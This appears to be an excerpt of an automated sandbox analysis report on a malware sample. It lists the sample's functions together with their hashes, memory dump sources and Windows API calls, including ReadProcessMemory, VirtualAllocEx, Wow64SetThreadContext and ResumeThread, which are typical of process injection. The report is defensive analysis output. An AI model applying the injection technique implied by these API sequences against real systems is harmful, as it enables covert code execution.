                                                                  • Instruction ID: 2dd6cc39290e8dd1174165a5049faad8f938b94f66362f38529738af2c7eeb78
                                                                  • Opcode Fuzzy Hash: d34981d6c61796e24e6239b2d4624bbb7f25cb6e50f0c028918e0ea321d2aabd
                                                                  • Instruction Fuzzy Hash: 7D2125B59003599FDB10DFAAC980BEEBBF5FF48310F10842AE919A7240D7799944CFA5
                                                                  Function 0718E6E8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0718E768
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451208286.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7180000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessRead
                                                                  • String ID:
                                                                  • API String ID: 1726664587-0
                                                                  • Opcode ID: f4061f387b63a91367f80e594ef63f96f212a061caec5d622a528f4aac23d1d1
                                                                  • Instruction ID: cfc75c9ecd01ba6d33b1c059a323378ba3a83fe9270b987b389a0bb42c667abf
                                                                  • Opcode Fuzzy Hash: f4061f387b63a91367f80e594ef63f96f212a061caec5d622a528f4aac23d1d1
                                                                  • Instruction Fuzzy Hash: A22114B19003499FDB10DFAAC980BEEBBF5FF48310F10842EE919A7250C7799945CBA5
                                                                  Function 0718E028 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0718E0A6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451208286.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7180000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: ContextThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 983334009-0
                                                                  • Opcode ID: fb5d72d282dd106e9daf945553602eff7d13138fa1f14becf51e791e753892bd
                                                                  • Instruction ID: e0b8dee226bb191082edfab613c33672b768997933e28324194bd9e0563fe2c1
                                                                  • Opcode Fuzzy Hash: fb5d72d282dd106e9daf945553602eff7d13138fa1f14becf51e791e753892bd
                                                                  • Instruction Fuzzy Hash: F82138B1D003099FDB14DFAAC484BEEBBF4EF88210F14842ED459A7280CB799945CFA5
                                                                  Function 02A5D588 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02A5D60F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1447061842.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2a50000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: 5ca0ce4063a69486e3e25a372cb8c8c9942b0e754884a85c168a0b6b3f333cef
                                                                  • Instruction ID: 25dd5286ce0824c40f2c1213027b9b8c8f06a01e662f710a56f6187c8381ba69
                                                                  • Opcode Fuzzy Hash: 5ca0ce4063a69486e3e25a372cb8c8c9942b0e754884a85c168a0b6b3f333cef
                                                                  • Instruction Fuzzy Hash: 8321E4B5D00248DFDB10CF9AD984ADEFBF4EB48310F14841AE918A7350D379A940CF65
                                                                  Function 02A5D581 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02A5D60F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1447061842.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2a50000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: 9ce561cb8287af7eefa9f7ed7842b842f49c2a80ada89e8d3832f74b3cc2df72
                                                                  • Instruction ID: 4a0eb33d4877c4328ee184af9b6ebce081b7e607949c599490302066cb2b1782
                                                                  • Opcode Fuzzy Hash: 9ce561cb8287af7eefa9f7ed7842b842f49c2a80ada89e8d3832f74b3cc2df72
                                                                  • Instruction Fuzzy Hash: 872100B5900248DFDB10CFAAD584AEEBBF4EB08310F14841AE918A7211D379AA44CF64
                                                                  Function 07191254 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,07193482,?,?,?,?,?), ref: 07193527
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451271228.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7190000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFromIconResource
                                                                  • String ID:
                                                                  • API String ID: 3668623891-0
                                                                  • Opcode ID: ad38f144a05b991c1f331fc4a813ce547a0c93368b0083ca0c657e46050b3d62
                                                                  • Instruction ID: da2a45acc5427c32a8cf863847877aad377d3e8881a92d7f2685118b36977aa7
                                                                  • Opcode Fuzzy Hash: ad38f144a05b991c1f331fc4a813ce547a0c93368b0083ca0c657e46050b3d62
                                                                  • Instruction Fuzzy Hash: CB1129B5900349EFDB10DF9AD844BDEBFF8EB48310F14841AE954A7250C379A954CFA5
                                                                  Function 0718E538 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0718E5A6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451208286.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7180000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: fdac8a233884a0ce334d89b480ce8788bf2ba37184806f88a4538902fd0541bd
                                                                  • Instruction ID: 3b239d6f3feec58d9fa6cca235e1e95a4b342cf6f9861c72ded45f554bfea751
                                                                  • Opcode Fuzzy Hash: fdac8a233884a0ce334d89b480ce8788bf2ba37184806f88a4538902fd0541bd
                                                                  • Instruction Fuzzy Hash: 9C116A759003489FDB10DFAAC844BDFBBF5EF48310F148819E515A7250C7759540CFA5
                                                                  Function 0718DB40 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451208286.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7180000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0
                                                                  • Opcode ID: 588645995bb82c23aef22d635b147fd7204cf31744d1d2da55676343b1d6b3ca
                                                                  • Instruction ID: 226605bb5d26d1f0791cf09f50813aaec549a61f2794851ec672771c29dcc2cd
                                                                  • Opcode Fuzzy Hash: 588645995bb82c23aef22d635b147fd7204cf31744d1d2da55676343b1d6b3ca
                                                                  • Instruction Fuzzy Hash: 1B1128B5D003488FDB24DFAAC444BEEFBF4EF88220F14841AD559A7240CB79A540CF95
                                                                  Function 02A5B298 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 02A5B2FE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1447061842.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2a50000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  • Opcode ID: 4ed710ad6757c3771638ce043d792c645acf94b1b6f28a38fe22b6ef7466f2f4
                                                                  • Instruction ID: cbe8282a735b7a9127abb4c9e5e327b119b343b98ea8b696f1ecec7553483ce1
                                                                  • Opcode Fuzzy Hash: 4ed710ad6757c3771638ce043d792c645acf94b1b6f28a38fe22b6ef7466f2f4
                                                                  • Instruction Fuzzy Hash: 74110FB6D006498FDB20CF9AC444BDFFBF8EB88224F10845AD819A7610C379A545CFA5
                                                                  Function 076610E1 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PostMessageW.USER32(?,?,?,?), ref: 07661145
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451956524.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7660000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost
                                                                  • String ID:
                                                                  • API String ID: 410705778-0
                                                                  • Opcode ID: 6a6bab11fcfbd13e8dee50ddd6df1e81b8efa582d42f4e82691e57bbb2b71a87
                                                                  • Instruction ID: e61e70c7e8eaae8cced7122b4da61073220c1a9f353ef925099ea945e04b2722
                                                                  • Opcode Fuzzy Hash: 6a6bab11fcfbd13e8dee50ddd6df1e81b8efa582d42f4e82691e57bbb2b71a87
                                                                  • Instruction Fuzzy Hash: 8211F5B58003499FDB10CF9AC885BDEFBF8EB48314F10841AE559A7310C379A544CFA5
                                                                  Function 076610E8 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PostMessageW.USER32(?,?,?,?), ref: 07661145
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451956524.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7660000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost
                                                                  • String ID:
                                                                  • API String ID: 410705778-0
                                                                  • Opcode ID: 4581dfde354794895cce57a867e9bff5f6a1d36974bfcfa44df642e82011197c
                                                                  • Instruction ID: dfcccb82d10025d738379908c7d4ee06455b489d7dc461f37d815664048d9221
                                                                  • Opcode Fuzzy Hash: 4581dfde354794895cce57a867e9bff5f6a1d36974bfcfa44df642e82011197c
                                                                  • Instruction Fuzzy Hash: 0711C2B58003499FDB10CF9AC885BDEFBF8EB48314F10841AE559A7650C375A544CFA5
                                                                  Function 07194BD4 Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,071954C9,?,?), ref: 07195A78
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451271228.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7190000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle
                                                                  • String ID:
                                                                  • API String ID: 2962429428-0
                                                                  • Opcode ID: 4289eb3951cfcacb577a09c25a45cf8953bb49997c3477934a7302790ce164ca
                                                                  • Instruction ID: 9fd51d233c657b0f111b0e9823790e9fe0d714198782f99b7687ac2751ceaa65
                                                                  • Opcode Fuzzy Hash: 4289eb3951cfcacb577a09c25a45cf8953bb49997c3477934a7302790ce164ca
                                                                  • Instruction Fuzzy Hash: 601116B5800749DFDB20DF99C585BDEBBF4EB48320F108429E559A7280D339A545CBA9
                                                                  Function 07195A18 Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,071954C9,?,?), ref: 07195A78
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451271228.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7190000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle
                                                                  • String ID:
                                                                  • API String ID: 2962429428-0
                                                                  • Opcode ID: 8e7784cada116119beaba361c45a980204060a51bf0775b96c74dfb2aafbe900
                                                                  • Instruction ID: fbaabd4d45c20a70bd21c05178b3de1b6c94871c5a9172c83ebe1cf455f2c759
                                                                  • Opcode Fuzzy Hash: 8e7784cada116119beaba361c45a980204060a51bf0775b96c74dfb2aafbe900
                                                                  • Instruction Fuzzy Hash: 911155B6800249DFDB20DF99C084BDEBBF0EB48320F10841AD558AB280C339A545CFA5
                                                                  Function 013DD3D8 Relevance: .1, Instructions: 75COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1446763022.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_13dd000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 44fd036b38b1952371e29c4a8763352607d08eeea9e422c3b860fa671ae082c4
                                                                  • Instruction ID: d7fb090b9f151f795b97e99a5cfd18ff06dcc494afe05abd18ab9d4b8156781a
                                                                  • Opcode Fuzzy Hash: 44fd036b38b1952371e29c4a8763352607d08eeea9e422c3b860fa671ae082c4
                                                                  • Instruction Fuzzy Hash: 35213872500204DFDB15DF54E5C0B56BB75FB84318F20C16CE9091F296C736E456CAA2
                                                                  Function 013DD4C4 Relevance: .1, Instructions: 75COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1446763022.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_13dd000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 71e01d6600f1aa47d88f4a688519df29370f35e7130495aa583439d1fad36aca
                                                                  • Instruction ID: b7f121e01664aa6d74b744093218ed17685706fbc90e31f702d4b9112cbec304
                                                                  • Opcode Fuzzy Hash: 71e01d6600f1aa47d88f4a688519df29370f35e7130495aa583439d1fad36aca
                                                                  • Instruction Fuzzy Hash: E12103B2500244EFDB15DF64E9C0B26BF66FB8831CF20C569E9090F696C336D456CBA2
                                                                  Function 02A0D1D4 Relevance: .1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1446848876.0000000002A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A0D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2a0d000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ffa3f0b606fad1ab43648f2b278247c216559ed8e1793c8a4fb152a8a9ba2579
                                                                  • Instruction ID: 82bac63999ac6467126255596834216b3387a04bf8d4b01a76ccaa43b7c4a55e
                                                                  • Opcode Fuzzy Hash: ffa3f0b606fad1ab43648f2b278247c216559ed8e1793c8a4fb152a8a9ba2579
                                                                  • Instruction Fuzzy Hash: 9621C172904600EFDB15DF94E5C0B25FB65FB8C314F20C56DE8094B292CB36D846CA61
                                                                  Function 02A0D01C Relevance: .1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1446848876.0000000002A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A0D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2a0d000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 679543d2d3286b075b5894a6f310b1a7e08a0700f89d249d77ad3f11efcb184c
                                                                  • Instruction ID: b6c3c57547bf8b77926a23946321f56afdf9c461c6767800ee787af2124549bc
                                                                  • Opcode Fuzzy Hash: 679543d2d3286b075b5894a6f310b1a7e08a0700f89d249d77ad3f11efcb184c
                                                                  • Instruction Fuzzy Hash: 1221D072604600EFDB14DF64E9C4F26BB65FB84314F20C56DE80E4B296CB36D847CA62
                                                                  Function 02A0D006 Relevance: .1, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1446848876.0000000002A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A0D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2a0d000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 671ca0b4b53ebf7dba68ca2fc1ce0bf32f86619c05342f8540e3ff34678d7dde
                                                                  • Instruction ID: 2c78b9b1879975e52cedca8bea2262d40bd541110e10e6d66b6cacf66b962c9f
                                                                  • Opcode Fuzzy Hash: 671ca0b4b53ebf7dba68ca2fc1ce0bf32f86619c05342f8540e3ff34678d7dde
                                                                  • Instruction Fuzzy Hash: 4A219F765097809FCB16CF20E9D4B15BF71EB46314F28C5DAD8498B6A7C33A940ACB62
                                                                  Function 013DD4BF Relevance: .1, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1446763022.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_13dd000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
                                                                  • Instruction ID: ef2d366a5eac9c7adde58e68678e06b15094606663a69fb99f5f67bc660f5fe7
                                                                  • Opcode Fuzzy Hash: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
                                                                  • Instruction Fuzzy Hash: 891103B2404280DFCB16CF54E5C0B16BF72FB84318F24C6A9D8090B697C336D456CBA2
                                                                  Function 013DD3D3 Relevance: .1, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1446763022.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_13dd000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
                                                                  • Instruction ID: 9f14eae22da8423aac3df5c47030ce14e42046b2e88a9ff6dbe27b8c05570c4c
                                                                  • Opcode Fuzzy Hash: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
                                                                  • Instruction Fuzzy Hash: 561103B2404240DFDB16CF44E5C0B56BF71FB84328F24C6A9D9090B697C33AE456CBA2
                                                                  Function 02A0D1CF Relevance: .1, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1446848876.0000000002A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A0D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2a0d000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                                                  • Instruction ID: fbb7f179bbd4814ddb4eb7017997a5f6895396fa48c5f2b3b149b0cb860eb521
                                                                  • Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                                                  • Instruction Fuzzy Hash: 5311BBB6904680DFCB15CF54E5C0B15FBA1FB88314F24C6A9D8494B696C33AD40ACB62
                                                                  Function 013DD745 Relevance: .0, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1446763022.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_13dd000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ef813e902f90ea8bf20ba1594c8ca4df643f4509ff8c5cd10980cc76058dd9fc
                                                                  • Instruction ID: 441ca46710bbb8c969b8ed4b325db814b9ed457f7c3e0fb3073505db7cb00476
                                                                  • Opcode Fuzzy Hash: ef813e902f90ea8bf20ba1594c8ca4df643f4509ff8c5cd10980cc76058dd9fc
                                                                  • Instruction Fuzzy Hash: 15012B32504384AAF7204F69DD84B66FF9CEF41268F08C59AED090F2C3D2399440CAB2
                                                                  Function 013DD744 Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1446763022.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_13dd000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 34fd95387d8522b5dc15fc4776dd962e87571294a02a969cb58ff4c480cb7b38
                                                                  • Instruction ID: b24aa98d66daef29079a94d9756e8198a5bf4f33cbaa674dab0099ccb58781c2
                                                                  • Opcode Fuzzy Hash: 34fd95387d8522b5dc15fc4776dd962e87571294a02a969cb58ff4c480cb7b38
                                                                  • Instruction Fuzzy Hash: CCF0C832404340AEE7208E19D884B62FF98EB41634F18C05AED080F2C7C2755840CB71

                                                                  Non-executed Functions

                                                                  Function 0719CD48 Relevance: 2.2, Strings: 1, Instructions: 902COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451271228.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7190000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: PHq
                                                                  • API String ID: 0-3820536768
                                                                  • Opcode ID: 39a41163537088208a561eb4834792e42e6b8abedb353d8bf3157b16efa8d403
                                                                  • Instruction ID: dfe0f3b44473a7b02d861fca265c8c052ac77880ff80bc314f87737eddd6172d
                                                                  • Opcode Fuzzy Hash: 39a41163537088208a561eb4834792e42e6b8abedb353d8bf3157b16efa8d403
                                                                  • Instruction Fuzzy Hash: 19728CB0E00219CFCF15DFA8D9846ADBBB1FF84300F1585A5D486BB295D730A992CF91
                                                                  Function 0718D318 Relevance: .3, Instructions: 312COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451208286.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7180000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2fd70878a480cf67d2a851b8a76305dd35a0bab31663c58f7750f98cc29816f8
                                                                  • Instruction ID: b76b7e77e6a9864e8687c59e1ce10f1633be2d78fe65409bb63c93a2c1be4187
                                                                  • Opcode Fuzzy Hash: 2fd70878a480cf67d2a851b8a76305dd35a0bab31663c58f7750f98cc29816f8
                                                                  • Instruction Fuzzy Hash: 9BE10CB4E002198FDB14DFA9D584AAEFBB2FF89305F248159D854AB395D730AD41CFA0
                                                                  Function 0718E100 Relevance: .3, Instructions: 312COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451208286.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7180000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 68e5aacf8fe035e65e01593ab80b0751bf784d8f85d4d7934298d231b1def1fd
                                                                  • Instruction ID: 1593f66befedfa632ceb332e04f7defbdfcc4b959aab3eaf186f760440f3d8e0
                                                                  • Opcode Fuzzy Hash: 68e5aacf8fe035e65e01593ab80b0751bf784d8f85d4d7934298d231b1def1fd
                                                                  • Instruction Fuzzy Hash: F0E1EBB4E002198FDB54DFA9C584AAEFBB2FF89305F248169D814AB359D730AD45CF60
                                                                  Function 0718C078 Relevance: .3, Instructions: 312COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451208286.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7180000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: eb9e703fb1fe1996435a42f201064963085f8042fb2baa2e04bba876fa59ab45
                                                                  • Instruction ID: 291d8869e0542551ed6b87114424bc2a886d6e930990d752b76c72646e78863d
                                                                  • Opcode Fuzzy Hash: eb9e703fb1fe1996435a42f201064963085f8042fb2baa2e04bba876fa59ab45
                                                                  • Instruction Fuzzy Hash: 26E1FDB4E002198FDB54DFA9C584AAEFBB2FF89305F248199D814AB355D7309D41CFA0
                                                                  Function 0718DBF0 Relevance: .3, Instructions: 312COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451208286.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7180000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 42a7d5643bfc3b5d6859ebfa9599fd38d299a3f9a48c55532e0cf535f31eb06f
                                                                  • Instruction ID: bb8f96ec650ff43b85d6235cbeb8aa168c811e96264fbcc71f58a590aefc3668
                                                                  • Opcode Fuzzy Hash: 42a7d5643bfc3b5d6859ebfa9599fd38d299a3f9a48c55532e0cf535f31eb06f
                                                                  • Instruction Fuzzy Hash: 61E1FAB4E002198FDB14DFA9D584AAEFBB2FF49305F248159D854AB399D730AD41CFA0
                                                                  Function 02A5DE84 Relevance: .3, Instructions: 264COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1447061842.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2a50000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b561f697a495e118052dbec0d0970bf5729ab9c3c401d46f2afc96612539da03
                                                                  • Instruction ID: ab19f5ea7eecb7195562e072b09ee19c08cca0fb8ea5300206abf81c7e9ea864
                                                                  • Opcode Fuzzy Hash: b561f697a495e118052dbec0d0970bf5729ab9c3c401d46f2afc96612539da03
                                                                  • Instruction Fuzzy Hash: EFA15A32E006258FCF15DFB4C98059EB7B2FF85304B1585AAE906AB265EF31E956CF40

                                                                  Execution Graph

                                                                  Execution Coverage:1.2%
                                                                  Dynamic/Decrypted Code Coverage:4.5%
                                                                  Signature Coverage:8.4%
                                                                  Total number of Nodes:155
                                                                  Total number of Limit Nodes:15
